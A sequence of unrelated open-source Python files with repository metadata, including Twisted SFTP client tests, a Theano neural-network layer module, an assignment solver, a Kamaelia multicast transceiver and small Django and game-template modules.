d.addCallback(self.assertEqual, '')
d.addCallback(lambda _: self.runCommand('rmdir testLocalDirectory'))
d.addCallback(self.assertEqual, '')
return d
def testRename(self):
"""
Test that we can rename a file.
"""
def _check(results):
self.assertEqual(results[0], '')
self.assertEqual(results[1], 'testfile2')
return self.runCommand('rename testfile2 testfile1')
d = self.runScript('rename testfile1 testfile2', 'ls testfile?')
d.addCallback(_check)
d.addCallback(self.assertEqual, '')
return d
def testCommand(self):
d = self.runCommand('!echo hello')
return d.addCallback(self.assertEqual, 'hello')
class TestOurServerBatchFile(CFTPClientTestBase):
def setUp(self):
CFTPClientTestBase.setUp(self)
self.startServer()
def tearDown(self):
CFTPClientTestBase.tearDown(self)
return self.stopServer()
def _getBatchOutput(self, f):
fn = self.mktemp()
open(fn, 'w').write(f)
l = []
port = self.server.getHost().port
cmds = ('-p %i -l testuser '
'--known-hosts kh_test '
'--user-authentications publickey '
'--host-key-algorithms ssh-rsa '
'-K direct '
'-i dsa_test '
'-a --nocache '
'-v -b %s 127.0.0.1') % (port, fn)
cmds = test_conch._makeArgs(cmds.split(), mod='cftp')[1:]
log.msg('running %s %s' % (sys.executable, cmds))
env = os.environ.copy()
env['PYTHONPATH'] = os.pathsep.join(sys.path)
self.server.factory.expectedLoseConnection = 1
d = getProcessOutputAndValue(sys.executable, cmds, env=env)
def _cleanup(res):
os.remove(fn)
return res
d.addCallback(lambda res: res[0])
d.addBoth(_cleanup)
return d
def testBatchFile(self):
"""Test whether batch file function of cftp ('cftp -b batchfile').
This works by treating the file as a list of commands to be run.
"""
cmds = """pwd
ls
exit
"""
def _cbCheckResult(res):
res = res.split('\n')
log.msg('RES %s' % str(res))
self.failUnless(res[1].find(self.testDir) != -1, repr(res))
self.failUnlessEqual(res[3:-2], ['testDirectory', 'testRemoveFile',
'testRenameFile', 'testfile1'])
d = self._getBatchOutput(cmds)
d.addCallback(_cbCheckResult)
return d
def testError(self):
"""Test that an error in the batch file stops running the batch.
"""
cmds = """chown 0 missingFile
pwd
exit
"""
def _cbCheckResult(res):
self.failIf(res.find(self.testDir) != -1)
d = self._getBatchOutput(cmds)
d.addCallback(_cbCheckResult)
return d
def testIgnoredError(self):
"""Test that a minus sign '-' at the front of a line ignores
any errors.
"""
cmds = """-chown 0 missingFile
pwd
exit
"""
def _cbCheckResult(res):
self.failIf(res.find(self.testDir) == -1)
d = self._getBatchOutput(cmds)
d.addCallback(_cbCheckResult)
return d
class TestOurServerUnixClient(test_conch._UnixFixHome, CFTPClientTestBase):
def setUp(self):
test_conch._UnixFixHome.setUp(self)
CFTPClientTestBase.setUp(self)
self.startServer()
cmd1 = ('-p %i -l testuser '
'--known-hosts kh_test '
'--host-key-algorithms ssh-rsa '
'-a '
'-K direct '
'-i dsa_test '
'127.0.0.1'
)
port = self.server.getHost().port
cmds1 = (cmd1 % port).split()
o = options.ConchOptions()
def _(host, *args):
o['host'] = host
o.parseArgs = _
o.parseOptions(cmds1)
vhk = default.verifyHostKey
self.conn = conn = test_conch.SSHTestConnectionForUnix(None)
uao = default.SSHUserAuthClient(o['user'], o, conn)
return connect.connect(o['host'], int(o['port']), o, vhk, uao)
def tearDown(self):
CFTPClientTestBase.tearDown(self)
d = defer.maybeDeferred(self.conn.transport.loseConnection)
d.addCallback(lambda x : self.stopServer())
def clean(ign):
test_conch._UnixFixHome.tearDown(self)
return ign
return defer.gatherResults([d, self.conn.stopDeferred]).addBoth(clean)
def _getBatchOutput(self, f):
fn = self.mktemp()
open(fn, 'w').write(f)
port = self.server.getHost().port
cmds = ('-p %i -l testuser '
'-K unix '
'-a '
'-v -b %s 127.0.0.1') % (port, fn)
cmds = test_conch._makeArgs(cmds.split(), mod='cftp')[1:]
log.msg('running %s %s' % (sys.executable, cmds))
env = os.environ.copy()
env['PYTHONPATH'] = os.pathsep.join(sys.path)
self.server.factory.expectedLoseConnection = 1
d = getProcessOutputAndValue(sys.executable, cmds, env=env)
def _cleanup(res):
os.remove(fn)
return res
d.addCallback(lambda res: res[0])
d.addBoth(_cleanup)
return d
def testBatchFile(self):
"""Test that the client works even over a UNIX connection.
"""
cmds = """pwd
exit
"""
d = self._getBatchOutput(cmds)
d.addCallback(
lambda res : self.failIf(res.find(self.testDir) == -1,
"%s not in %r" % (self.testDir, res)))
return d
class TestOurServerSftpClient(CFTPClientTestBase):
"""
Test the sftp server against sftp command line client.
"""
def setUp(self):
CFTPClientTestBase.setUp(self)
return self.startServer()
def tearDown(self):
return self.stopServer()
def test_extendedAttributes(self):
"""
Test the return of extended attributes by the server: the sftp client
should ignore them, but still be able to parse the response correctly.
This test is mainly here to check that
L{filetransfer.FILEXFER_ATTR_EXTENDED} has the correct value.
"""
fn = self.mktemp()
open(fn, 'w').write("ls .\nexit")
port = self.server.getHost().port
oldGetAttr = FileTransferForTestAvatar._getAttrs
def _getAttrs(self, s):
attrs = oldGetAttr(self, s)
attrs["ext_foo"] = "bar"
return attrs
self.patch(FileTransferForTestAvatar, "_getAttrs", _getAttrs)
self.server.factory.expectedLoseConnection = True
cmds = ('-o', 'IdentityFile=dsa_test',
'-o', 'UserKnownHostsFile=kh_test',
'-o', 'HostKeyAlgorithms=ssh-rsa',
'-o', 'Port=%i' % (port,), '-b', fn, 'testuser@127.0.0.1')
d = getProcessOutputAndValue("sftp", cmds)
def check(result):
self.assertEquals(result[2], 0)
for i in ['testDirectory', 'testRemoveFile',
'testRenameFile', 'testfile1']:
self.assertIn(i, result[0])
return d.addCallback(check)
if not unix or not Crypto or not interfaces.IReactorProcess(reactor, None):
TestOurServerCmdLineClient.skip = "don't run w/o spawnprocess or PyCrypto"
TestOurServerBatchFile.skip = "don't run w/o spawnProcess or PyCrypto"
TestOurServerUnixClient.skip = "don't run w/o spawnProcess or PyCrypto"
TestOurServerSftpClient.skip = "don't run w/o spawnProcess or PyCrypto"
else:
from twisted.python.procutils import which
if not which('sftp'):
TestOurServerSftpClient.skip = "no sftp command-line client available"
| {
"content_hash": "e4e3653d11e958b7f4d82b928144fa59",
"timestamp": "",
"source": "github",
"line_count": 717,
"max_line_length": 79,
"avg_line_length": 34.84239888423989,
"alnum_prop": 0.5758546153230326,
"repo_name": "hortonworks/hortonworks-sandbox",
"id": "5df9dd9f69fe0f744757b1095bbdba0f8a4ab3f5",
"size": "25125",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "desktop/core/ext-py/Twisted/twisted/conch/test/test_cftp.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "ActionScript",
"bytes": "27264"
},
{
"name": "Assembly",
"bytes": "207947"
},
{
"name": "C",
"bytes": "10279874"
},
{
"name": "C++",
"bytes": "208068"
},
{
"name": "CSS",
"bytes": "356769"
},
{
"name": "Emacs Lisp",
"bytes": "3171"
},
{
"name": "Java",
"bytes": "3064179"
},
{
"name": "JavaScript",
"bytes": "1532806"
},
{
"name": "PHP",
"bytes": "4160"
},
{
"name": "Perl",
"bytes": "139518"
},
{
"name": "Python",
"bytes": "27735073"
},
{
"name": "R",
"bytes": "12290"
},
{
"name": "Ruby",
"bytes": "5050"
},
{
"name": "Shell",
"bytes": "42062"
},
{
"name": "XSLT",
"bytes": "585"
}
],
"symlink_target": ""
} |
from control4.maths.symbolic import apply_nonlinearity
from control4.maths.numeric import normc
from control4.config import floatX
import theano,theano.tensor as TT
import numpy as np
from control4.misc.collection_utils import concatenate
class ParameterizedFunc(object):
"""
Function with theano shared variables as parameters
"""
def __call__(self,*inputs):
raise NotImplementedError
def opt_vars(self):
raise NotImplementedError
def extra_vars(self):
return []
class DenseLayer(ParameterizedFunc):
"""
Affine transformation + nonlinearity
"""
def __init__(self, src_sizes, targ_size, nonlinearity, src_names=None, targ_name=None, col_norm=1.0):
"""
src_sizes: dimensionality of inputs
targ_size: dimensionality of output
nonlinearity: str, see apply_nonlinearity
src_names: optional, list of str names of inputs to this layer
targ_name: optional, str name of output of this layer
"""
if src_names is None: src_names = ["unnamedinput%i"%i for i in xrange(len(src_sizes))]
if targ_name is None: targ_name = "unnamedoutput"
n_in = len(src_sizes)
Ws_init = [normc(randn_init(src_size,targ_size))*(col_norm/np.sqrt(n_in)) for src_size in src_sizes]
b_init = np.zeros((1,targ_size),floatX)
self.Ws = [theano.shared(W,name="W_%s_%s"%(src_name,targ_name)) for (W,src_name) in zip(Ws_init,src_names)]
self.b = theano.shared(b_init,name="b_%s"%targ_name)
self.b.type.broadcastable = (True,False)
self.nonlinearity = nonlinearity
def __call__(self,*inputs):
assert len(inputs)==len(self.Ws)
summands = []
summands.extend([X.dot(W) for (W,X) in zip(self.Ws,inputs)])
summands.append(self.b)
return apply_nonlinearity(TT.add(*summands),self.nonlinearity)
def opt_vars(self):
return self.Ws + [self.b]
def extra_vars(self):
return []
class ElemwiseLinearLayer(ParameterizedFunc):
def __init__(self, size,name_prefix=""):
self.trans = theano.shared(np.zeros((1,size),floatX),name=name_prefix+'trans')
self.scaling = theano.shared(np.ones((1,size),floatX),name=name_prefix+'scaling')
self.trans.type.broadcastable = (True,False)
self.scaling.type.broadcastable = (True,False)
def __call__(self,X):
if X.dtype != floatX: X = TT.cast(X,floatX)
return (X+self.trans)*self.scaling
def opt_vars(self):
return []
def extra_vars(self):
return [self.trans,self.scaling]
def update(self, newtrans, newscaling):
self.trans.set_value(newtrans.reshape(1,-1))
self.scaling.set_value(newscaling.reshape(1,-1))
def update_with_compensation(self,newtrans,newscaling, nextW, nextb):
newtrans = newtrans.reshape(1,-1)
newscaling = newscaling.reshape(1,-1)
trans_old = self.trans.get_value()
scaling_old = self.scaling.get_value()
self.trans.set_value(newtrans)
self.scaling.set_value(newscaling)
nextW_old = nextW.get_value(borrow=True)
nextW_new = (scaling_old/newscaling).T * nextW_old
nextW.set_value(nextW_new)
nextb_old = nextb.get_value(borrow=True)
nextb_new = nextb_old + (trans_old * scaling_old).dot(nextW_old) - (newtrans * newscaling).dot(nextW_new)
nextb.set_value(nextb_new.reshape(1,-1))
class MLP(ParameterizedFunc):
"""
A sequence of DenseLayer
"""
def __init__(self, sizes, nonlinearities, names=None, init_col_norms=None):
"""
sizes: number of units at each layer
i.e., we have (sizes-1) weight matrices and nonlinearities
"""
assert len(nonlinearities) == len(sizes)-1
if names is None: names = [str(i) for i in xrange(len(sizes))]
else: assert len(names) == len(sizes)
if init_col_norms is None: init_col_norms = [1.0 for _ in xrange(len(nonlinearities))]
else: assert len(init_col_norms) == len(nonlinearities)
self.layers = []
prev_output_size = sizes[0]
prev_name = names[0]
for (output_size,nonlinearity,name,col_norm) in zip(sizes[1:],nonlinearities,names[1:],init_col_norms):
layer = DenseLayer([prev_output_size],output_size,nonlinearity=nonlinearity,src_names=[prev_name],targ_name=name,col_norm=col_norm)
self.layers.append(layer)
prev_output_size=output_size
prev_name = name
def __call__(self,X):
for layer in self.layers:
X = layer(X)
return X
def opt_vars(self):
out = []
for layer in self.layers:
out.extend(layer.opt_vars())
return out
def extra_vars(self):
return []
class LayerChain(ParameterizedFunc):
"""
A chain of ParameterizedFunc with one input and one output
"""
def __init__(self,layers):
self.layers = layers
def __call__(self,X):
for layer in self.layers:
X = layer(X)
return X
def opt_vars(self):
return concatenate(layer.opt_vars() for layer in self.layers)
def extra_vars(self):
return concatenate(layer.extra_vars() for layer in self.layers)
class NetworkFromFunc(ParameterizedFunc):
"""
Create a new ParameterizedFunc out of a bunch of smaller ones.
Pass in a function or lambda to constructor.
"""
def __init__(self, layers, f):
self.layers = layers
self.f = f
def __call__(self,*inputs):
return self.f(*inputs)
def opt_vars(self):
return concatenate(layer.opt_vars() for layer in self.layers)
def extra_vars(self):
return concatenate(layer.extra_vars() for layer in self.layers)
def randn_init(*shape):
"""
randn with normalized columns
"""
x = np.random.randn(*shape)
x /= np.sqrt(np.square(x).sum(axis=0))
x = x.astype(floatX)
return x
| {
"content_hash": "474dcf70e213b1682050de9514af0cb2",
"timestamp": "",
"source": "github",
"line_count": 185,
"max_line_length": 143,
"avg_line_length": 32.486486486486484,
"alnum_prop": 0.6232945091514143,
"repo_name": "SFPD/rlreloaded",
"id": "295e4f8d8e8b803869b8e9be3463fc84b70e8bc4",
"size": "6010",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "control4/nn/nn.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "753"
},
{
"name": "C++",
"bytes": "88527"
},
{
"name": "CMake",
"bytes": "33134"
},
{
"name": "Python",
"bytes": "478983"
},
{
"name": "Shell",
"bytes": "953"
}
],
"symlink_target": ""
} |
'''Hybrid assignment solver. Quickly finds a candidate solution and
then improves on it iteratively through branch-and-bound search.
'''
import uuid
import random
import logging
import numpy as np
import model
from solvers import Solver
from assignments.cached import CachedAssignment
class Node(object):
'''Branch and bound node. Contains an assignment and meta data
required for the search.
'''
def __init__(self, parameters, assignment, row, partition_count):
'''Create a branch-and-bound node. These nodes are created for each
branch searched.
Args:
parameters: Parametrs object.
assignment: Assignment object.
row: The row of the assignment matrix to consider next.
partition_count: Vector of length num_partitions with symbols
counts by partition.
'''
assert isinstance(parameters, model.SystemParameters)
assert isinstance(assignment, CachedAssignment)
assert isinstance(row, int) and 0 <= row < parameters.num_batches
assert isinstance(partition_count, list)
self.parameters = parameters
self.assignment = assignment
self.complete = False
self.row = row
# Find the next partially assigned row
while (self.row < parameters.num_batches and
assignment.batch_union({self.row}).sum() == parameters.rows_per_batch):
self.row += 1
# Mark assignment as completed if no partial rows
if self.row == parameters.num_batches:
self.complete = True
self.row = None
self.partition_count = partition_count
return
def __str__(self):
return 'Row: {} Complete: {} Score: {}'.format(self.row, self.complete, self.assignment.score)
class HybridSolver(Solver):
'''Hybrid assignment solver. Quickly finds a candidate solution and
then improves on it iteratively through branch-and-bound search.
'''
def __init__(self, initialsolver=None, directory=None, clear=3):
'''Create a hybrid solver.
Args:
initialsolver: The solver used to find the initial assignment.
directory: Store intermediate assignments in this directory.
Set to None to not store intermediate assignments.
clear: Number of elements of the assignment matrix to
re-assign per iteration.
'''
assert initialsolver is not None
assert isinstance(directory, str) or directory is None
self.initialsolver = initialsolver
self.directory = directory
self.clear = clear
return
def branch_and_bound(self, parameters, assignment, partition_count, best_assignment):
'''Assign any remaining elements optimally.'''
stack = list()
stack.append(Node(parameters, assignment, 0, partition_count))
completed = 0
pruned = 0
best_assignment = best_assignment
while stack:
node = stack.pop()
# Store completed nodes with a better score
if node.complete and node.assignment.score <= best_assignment.score:
logging.debug('Completed assignment with improvement %d.',
best_assignment.score - node.assignment.score)
best_assignment = node.assignment
completed += 1
for partition in range(parameters.num_partitions):
if not node.partition_count[partition]:
continue
# Only consider zero-valued elements
# if node.assignment.assignment_matrix[node.row, partition]:
# continue
# logging.debug('Completed %d, Pruned %d, Stack size %d: row/col: [%d, %d]',
# completed, pruned, len(stack), node.row, partition)
assignment = node.assignment.increment([node.row], [partition], [1])
# logging.debug('Best: %d. Bound: %d.', best_assignment.score, assignment.bound())
if assignment.bound() >= best_assignment.score:
pruned += 1
continue
partition_count = node.partition_count[:]
partition_count[partition] -= 1
stack.append(Node(parameters, assignment, node.row, partition_count))
return best_assignment
def deassign(self, parameters, assignment, partition_count, deassignments):
'''De-assign an element randomly.
Args:
parameters: Parametrs object.
assignment: Assignment object.
partition_count: Vector of length num_partitions with symbols
counts by partition.
deassignments: Number of deassignments to make.
Returns: The updated assignment.
'''
assert isinstance(deassignments, int) and deassignments > 0
# Cache the row and col indices to decrement.
indices = dict()
# Select row, col pairs.
while deassignments > 0:
row = random.randint(0, parameters.num_batches - 1)
col = random.randint(0, parameters.num_partitions - 1)
# Ensure that there are remaining values to decrement.
remaining = assignment.assignment_matrix[row, col] - 1
if (row, col) in indices:
remaining -= indices[(row, col)]
if remaining < 0:
continue
# Update the count
deassignments -= 1
partition_count[col] += 1
if (row, col) in indices:
indices[(row, col)] += 1
else:
indices[(row, col)] = 1
keys = indices.keys()
values = [indices[key] for key in keys]
rows = [index[0] for index in keys]
cols = [index[1] for index in keys]
return assignment.decrement(rows, cols, values)
def solve(self, parameters, assignment_type=None):
'''Find an assignment using this solver.
Args:
parameters: System parameters
Returns: The resulting assignment
'''
assert isinstance(parameters, model.SystemParameters)
assert assignment_type is None or assignment_type is CachedAssignment, \
'Solver must be used with CachedAssignment.'
# Load solution or find one using the initial solver.
try:
assignment = CachedAssignment.load(parameters, directory=self.directory)
logging.debug('Loaded a candidate solution from disk.')
except FileNotFoundError:
logging.debug('Finding a candidate solution using solver %s.', self.initialsolver.identifier)
assignment = self.initialsolver.solve(parameters, assignment_type=CachedAssignment)
if self.directory:
assignment.save(directory=self.directory)
# Ensure there is room for optimization.
counts = np.zeros(parameters.num_partitions)
for row in assignment.rows_iterator():
counts += row
if counts.sum() < self.clear:
logging.debug('Initial solution leaves no room for optimization. Returning.')
return assignment
# Make sure the dynamic programming index is built
if not assignment.index or not assignment.score:
assignment = CachedAssignment(parameters, gamma=assignment.gamma,
assignment_matrix=assignment.assignment_matrix,
labels=assignment.labels)
original_score = max(assignment.score, 1)
best_assignment = assignment.copy()
# Iteratively improve the assignment
iterations = 0
total_improvement = 0
moving_average = 1
stop_threshold = 0.0001
while moving_average > stop_threshold:
# Count symbols by partition
partition_count = [0] * parameters.num_partitions
# De-assign elements
decremented_assignment = self.deassign(parameters, best_assignment,
partition_count, self.clear)
# Re-assign optimally
improved_assignment = self.branch_and_bound(parameters, decremented_assignment,
partition_count, best_assignment)
iterations += 1
improvement = (best_assignment.score - improved_assignment.score) / original_score
total_improvement += improvement
moving_average *= 0.9
moving_average += improvement
best_assignment = improved_assignment.copy()
logging.info('Improved %f%% over %d iterations. Moving average: %f%%. Stop threshold: %f%%.',
total_improvement * 100, iterations, moving_average * 100, stop_threshold * 100)
if self.directory and improvement > 0:
best_assignment.save(directory=self.directory)
return best_assignment
@property
def identifier(self):
'''Return a string identifier for this object.'''
return self.__class__.__name__
| {
"content_hash": "b6ab7ab793899765005b811e25405b6e",
"timestamp": "",
"source": "github",
"line_count": 253,
"max_line_length": 105,
"avg_line_length": 36.29644268774704,
"alnum_prop": 0.6059022106065556,
"repo_name": "severinson/Coded-Shuffling",
"id": "6f784acafed0fbc767c26a2fecee211d8952c5a6",
"size": "10339",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "solvers/hybrid.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Makefile",
"bytes": "63"
},
{
"name": "Python",
"bytes": "235188"
}
],
"symlink_target": ""
} |
"""\
============================
Simple multicast transceiver
============================
A simple component for transmitting and receiving multicast packets.
Remember that multicast is an unreliable connection - packets may be lost,
duplicated or reordered.
Example Usage
-------------
Send a file to, and receive data from multicast group address 1.2.3.4 port 1000::
Pipeline( RateControlledFileReader("myfile", rate=100000),
Multicast_transceiver("0.0.0.0", 0, "1.2.3.4", 1000),
).activate()
Pipeline( Multicast_transceiver("0.0.0.0", 1000, "1.2.3.4", 0)
ConsoleEchoer()
).activate()
Or::
Pipeline( RateControlledFileReader("myfile", rate=100000),
Multicast_transceiver("0.0.0.0", 1000, "1.2.3.4", 1000),
ConsoleEchoer()
).activate()
The data emitted by Multicast_transciever (and displayed by ConsoleEchoer) is of
the form (source_address, data).
More detail
-----------
Data sent to the component's "inbox" inbox is sent to the multicast group.
Data received from the multicast group is emitted as a tuple:
(source_addr, data) where data is a string of the received data.
This component ignores anything received on its "control" inbox. It is not yet
possible to ask it to shut down. It does not terminate.
Multicast groups do not 'shut down', so this component never emits any signals
on its "signal" outbox.
Why a transciever component?
----------------------------
Listens for packets in the given multicast group. Any data received is
sent to the receiver's outbox. The logic here is likely to be not quite
ideal. When complete though, this will be preferable over the sender and
receiver components since it models what multicast really is rather than
what people tend to think it is.
"""
import socket
import Axon
class Multicast_transceiver(Axon.Component.component):
"""\
Multicast_transciever(local_addr, local_port, remote_addr, remote_port) -> component that send and receives data to/from a multicast group.
Creates a component that sends data received on its "inbox" inbox to the
specified multicast group; and sends to its "outbox" outbox tuples of the
form (src_addr, data) containing data received.
Keyword arguments:
- local_addr -- local address (interface) to send from (string)
- local_port -- port number
- remote_addr -- address of multicast group (string)
- remote_port -- port number
"""
Inboxes = { "inbox" : "Data to be sent to the multicast group",
"control" : "NOT USED",
}
Outboxes = { "outbox" : "Emits (src_addr, data_received)",
"signal" : "NOT USED",
}
def __init__(self, local_addr, local_port, remote_addr, remote_port, debug=False):
"""x.__init__(...) initializes x; see x.__class__.__doc__ for signature"""
super(Multicast_transceiver, self).__init__()
self.local_addr = local_addr # Multicast address we join
self.local_port = local_port # and port
self.remote_addr = remote_addr # Multicast address we send to (may be same)
self.remote_port = remote_port # and port.
self.debug = debug
def main(self):
"""Main loop"""
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind((self.local_addr,self.local_port)) # Receive from server on this port
sock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 255)
status = sock.setsockopt(socket.IPPROTO_IP,
socket.IP_ADD_MEMBERSHIP,
socket.inet_aton(self.remote_addr) + socket.inet_aton("0.0.0.0"))
sock.setblocking(0)
# This buffer collects data to be sent
tosend = []
while 1:
try:
data, addr = sock.recvfrom(16384)
except socket.error, e:
pass
else:
message = (addr, data)
self.send(message,"outbox")
yield 1
while self.dataReady("inbox"):
data = self.recv()
tosend.append(data)
if self.debug:
print self.inboxes["inbox"]
while len(tosend)>0:
try:
l = sock.sendto(tosend[0], (self.remote_addr,self.remote_port) );
del tosend[0]
except socket.error, e:
# break out the loop, since we can't send right now
break
def tests():
print "This module is acceptance tested as part of a system."
print "Please see the test/test_MulticastTransceiverSystem.py script instead"
__kamaelia_components__ = ( Multicast_transceiver, )
if __name__=="__main__":
tests()
| {
"content_hash": "aa49c66fd40fd0532d221f1d65deb48f",
"timestamp": "",
"source": "github",
"line_count": 148,
"max_line_length": 142,
"avg_line_length": 33.12162162162162,
"alnum_prop": 0.6128110975112199,
"repo_name": "bbc/kamaelia",
"id": "12cfeca9ca1ea0414f1ae5f5f05fd3de37aa4b4a",
"size": "5803",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "Sketches/MPS/BugReports/FixTests/Kamaelia/Kamaelia/Internet/Multicast_transceiver.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "ApacheConf",
"bytes": "62985"
},
{
"name": "C",
"bytes": "212854"
},
{
"name": "C++",
"bytes": "327546"
},
{
"name": "CSS",
"bytes": "114434"
},
{
"name": "ChucK",
"bytes": "422"
},
{
"name": "Diff",
"bytes": "483"
},
{
"name": "Gettext Catalog",
"bytes": "3919909"
},
{
"name": "HTML",
"bytes": "1288960"
},
{
"name": "Java",
"bytes": "31832"
},
{
"name": "JavaScript",
"bytes": "829491"
},
{
"name": "Makefile",
"bytes": "5768"
},
{
"name": "NSIS",
"bytes": "18867"
},
{
"name": "PHP",
"bytes": "49059"
},
{
"name": "Perl",
"bytes": "31234"
},
{
"name": "Processing",
"bytes": "2885"
},
{
"name": "Pure Data",
"bytes": "7485482"
},
{
"name": "Python",
"bytes": "18896320"
},
{
"name": "Ruby",
"bytes": "4165"
},
{
"name": "Shell",
"bytes": "711244"
}
],
"symlink_target": ""
} |
from swgpy.object import *
def create(kernel):
result = Tangible()
result.template = "object/tangible/food/crafted/shared_drink_angerian_fishak_surprise.iff"
result.attribute_template_id = 5
result.stfName("food_name","angerian_fishak_surprise")
#### BEGIN MODIFICATIONS ####
#### END MODIFICATIONS ####
return result | {
"content_hash": "ab25956a995d6ea96140c2e9e0ec1d64",
"timestamp": "",
"source": "github",
"line_count": 13,
"max_line_length": 91,
"avg_line_length": 25.76923076923077,
"alnum_prop": 0.7164179104477612,
"repo_name": "anhstudios/swganh",
"id": "0f282a0e76888845cefb665e2fc3b4c4cfa599e7",
"size": "480",
"binary": false,
"copies": "2",
"ref": "refs/heads/develop",
"path": "data/scripts/templates/object/tangible/food/crafted/shared_drink_angerian_fishak_surprise.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "11887"
},
{
"name": "C",
"bytes": "7699"
},
{
"name": "C++",
"bytes": "2357839"
},
{
"name": "CMake",
"bytes": "41264"
},
{
"name": "PLSQL",
"bytes": "42065"
},
{
"name": "Python",
"bytes": "7503510"
},
{
"name": "SQLPL",
"bytes": "42770"
}
],
"symlink_target": ""
} |
from pyccel.decorators import types
@types('int')
def func(n,m):
return n + m
| {
"content_hash": "5f76fdae17c498dff79326ceb47547e8",
"timestamp": "",
"source": "github",
"line_count": 6,
"max_line_length": 35,
"avg_line_length": 14,
"alnum_prop": 0.6666666666666666,
"repo_name": "ratnania/pyccel",
"id": "285f80ab8439587f5b95096cad4bdf37e73dbe43",
"size": "156",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/errors/semantic/blocking/DECORATOR_WRONG_NUMBER_TYPES.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CMake",
"bytes": "111665"
},
{
"name": "Python",
"bytes": "863199"
},
{
"name": "Shell",
"bytes": "712"
}
],
"symlink_target": ""
} |
from django.conf.urls.defaults import *
rootpatterns = patterns('',
(r'^account/', include('registration.urls')),
)
| {
"content_hash": "a2846656530eec8e05d8bc59f9ed67ee",
"timestamp": "",
"source": "github",
"line_count": 5,
"max_line_length": 49,
"avg_line_length": 24.2,
"alnum_prop": 0.6859504132231405,
"repo_name": "stonezdj/forzdj",
"id": "38cb6c446e8e10797f13b027e013c3e635f32e50",
"size": "121",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "registration/urlsauto.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "21230"
},
{
"name": "JavaScript",
"bytes": "12164"
},
{
"name": "Python",
"bytes": "246618"
}
],
"symlink_target": ""
} |
"""This module contains Melange cron jobs."""
| {
"content_hash": "8b11845f5b43d419c37ae97bf9b9b03d",
"timestamp": "",
"source": "github",
"line_count": 1,
"max_line_length": 45,
"avg_line_length": 46,
"alnum_prop": 0.717391304347826,
"repo_name": "jamslevy/gsoc",
"id": "e10dbbd7e2573809a0f7e944f66f488aa317b889",
"size": "631",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "app/soc/cron/__init__.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "400472"
},
{
"name": "JavaScript",
"bytes": "388268"
},
{
"name": "Perl",
"bytes": "66733"
},
{
"name": "Python",
"bytes": "8290513"
},
{
"name": "Shell",
"bytes": "5570"
}
],
"symlink_target": ""
} |
import os
from subliminal import download_best_subtitles, save_subtitles
from subliminal.video import Episode
from subliminal.core import search_external_subtitles
from babelfish.language import Language
class FileSubtitler:
def __init__(self, languages, providers):
self.languages = languages
self.providers = providers
def subtitle(self, episodes):
# Parse babelfish languages
bb_lang = {Language.fromietf(l) for l in self.languages}
# Create subliminal episode set
sub_episodes = set()
for episode in episodes:
ep_path = os.path.join(episode['dir'], episode['filename'])
sub_episode = Episode.fromguess(ep_path, episode)
# Look for external subtitles (not done automatically, apparently)
sub_episode.subtitle_languages |= set(search_external_subtitles(sub_episode.name).values())
sub_episodes.add(sub_episode)
# download subtitles in the specified language
subl_subtitles = download_best_subtitles(sub_episodes, bb_lang, providers=self.providers)
for video, subtitles in subl_subtitles.items():
save_subtitles(video, subtitles)
# save subtitle languages in episode dict | {
"content_hash": "b0feeb7692988632834739df3bb73ff0",
"timestamp": "",
"source": "github",
"line_count": 40,
"max_line_length": 103,
"avg_line_length": 31.475,
"alnum_prop": 0.6799046862589356,
"repo_name": "rkohser/gustaf2",
"id": "44b5582ca5c8f5bb8a0d6cb78e64a53a92249c9c",
"size": "1259",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "back/fs/filesubtitler.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "467"
},
{
"name": "CSS",
"bytes": "179"
},
{
"name": "HTML",
"bytes": "3255"
},
{
"name": "JavaScript",
"bytes": "1645"
},
{
"name": "Python",
"bytes": "9151"
},
{
"name": "TypeScript",
"bytes": "12672"
}
],
"symlink_target": ""
} |
from django import forms
from django.utils.translation import ugettext as _
from search.models import Collection
from search_controller import SearchController
class QueryForm(forms.Form):
collection = forms.ChoiceField() # Aka collection_id
query = forms.CharField(label='', max_length=256, required=False, initial='',
widget=forms.TextInput(attrs={'class': 'search-query input-xxlarge', 'placeholder': 'Search...'}))
fq = forms.CharField(label='', max_length=256, required=False, initial='', widget=forms.HiddenInput(), help_text='Solr Filter query')
sort = forms.CharField(label='', max_length=256, required=False, initial='', widget=forms.HiddenInput(), help_text='Solr sort')
rows = forms.CharField(label='', required=False, initial='', widget=forms.HiddenInput(), help_text='Solr records per page')
start = forms.CharField(label='', required=False, initial='', widget=forms.HiddenInput(), help_text='Solr start record')
facets = forms.CharField(label='', required=False, initial='', widget=forms.HiddenInput(), help_text='Show hide facet search')
def __init__(self, *args, **kwargs):
self.initial_collection = kwargs.pop('initial_collection')
super(QueryForm, self).__init__(*args, **kwargs)
choices = [(core.id, core.label) for core in Collection.objects.filter(enabled=True)]
# Beware: initial not working, set in the js
self.fields['collection'] = forms.ChoiceField(choices=choices, initial=self.initial_collection, required=False, label='', widget=forms.Select(attrs={'class':'hide'}))
def clean_collection(self):
if self.cleaned_data.get('collection'):
return self.cleaned_data['collection']
else:
return self.initial_collection
class HighlightingForm(forms.Form):
fields = forms.MultipleChoiceField(required=False)
is_enabled = forms.BooleanField(label='Enabled', initial=True, required=False)
def __init__(self, *args, **kwargs):
fields = kwargs.pop('fields')
super(HighlightingForm, self).__init__(*args, **kwargs)
